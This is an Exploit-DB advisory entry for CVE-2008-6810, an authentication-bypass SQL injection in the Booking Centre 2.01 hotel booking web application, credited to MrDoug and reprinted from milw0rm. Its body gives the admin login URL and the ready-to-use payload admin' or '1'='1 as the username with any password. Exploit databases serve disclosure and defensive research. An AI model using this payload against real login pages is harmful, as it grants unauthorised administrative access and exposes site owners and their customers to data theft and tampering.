Booking Centre 2.01 Auth Bypass SQL Injection Vulnerability

2008-11-28T00:00:00
ID EDB-ID:7263
Type exploitdb
Reporter MrDoug
Modified 2008-11-28T00:00:00

Description

Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability. CVE-2008-6810. Webapps exploit for php platform

                                        
                                            
Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability

--------------------------------------------------------------

Author: MrDoug
E-mail: mrdoug13[at]gmail[dot]com

--------------------------------------------------------------

Exploit: http://demo.hotelsadmin.com/admin/index.php

Username == admin' or '1'='1
password == (whatever)

--------------------------------------------------------------

Greetz to Slappywag

--------------------------------------------------------------

# milw0rm.com [2008-11-28]